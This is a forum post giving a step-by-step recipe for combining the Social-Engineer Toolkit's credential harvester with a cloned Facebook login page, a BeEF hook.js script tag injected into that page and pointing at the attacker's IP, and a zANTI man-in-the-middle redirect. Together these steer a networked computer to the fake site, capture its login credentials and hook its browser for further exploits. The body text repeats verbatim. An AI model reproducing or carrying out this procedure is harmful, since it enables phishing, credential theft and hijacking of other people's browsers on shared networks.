unknownpwn
2014-12-19, 02:29
Hi all, just wanted to share something I found useful while pentesting my devices at home, hooking a browser with beef-xss and getting login credentials at the same time.
Start off by starting SET (Kalimenu -> 6 -> 3 ), then choose options 1, 2, 3, 2 (Credential harvester method) and enter your IP address. Next, choose option 2 and clone a site with a login, I chose for example facebook.
Next you need to chmod index.html to 755 so people can access your webpage
chmod 755 /var/www/index.html.
Next we'll inject the hook.js code into the index.html file. insert the following after <head> and before </head> .
<script type="text/javascript" src="http://<youripaddress>:3000/hook.js"></script>
Now is a good time to start up your apache server and launch beef-xss (Kalimenu -> 6 -> 2) and log in to the beef-xss web ui.
Next we'll start zANTI on your NetHunter device and scan the network. Target the computer you want to hook in the list by clicking on it and then going to "Man in the Middle".
Press the cogwheel next to "Redirect HTTP" and enter the IP of your device running beef-xss, then enable it. Finally press "on" in the top right corner to enable MITM.
If you try accessing the internet from the attacked computer now it should automatically load up your fake facebook-site (or whichever site you chose) and the browser should be hooked in beef-xss for further exploits.
Thanks for reading. And please let me know if there's any errors or if there's any improvements that can be made :)
Start off by starting SET (Kalimenu -> 6 -> 3 ), then choose options 1, 2, 3, 2 (Credential harvester method) and enter your IP address. Next, choose option 2 and clone a site with a login, I chose for example facebook.
Next you need to chmod index.html to 755 so people can access your webpage
chmod 755 /var/www/index.html.
Next we'll inject the hook.js code into the index.html file. insert the following after <head> and before </head> .
<script type="text/javascript" src="http://<youripaddress>:3000/hook.js"></script>
Now is a good time to start up your apache server and launch beef-xss (Kalimenu -> 6 -> 2) and log in to the beef-xss web ui.
Next we'll start zANTI on your NetHunter device and scan the network. Target the computer you want to hook in the list by clicking on it and then going to "Man in the Middle".
Press the cogwheel next to "Redirect HTTP" and enter the IP of your device running beef-xss, then enable it. Finally press "on" in the top right corner to enable MITM.
If you try accessing the internet from the attacked computer now it should automatically load up your fake facebook-site (or whichever site you chose) and the browser should be hooked in beef-xss for further exploits.
Thanks for reading. And please let me know if there's any errors or if there's any improvements that can be made :)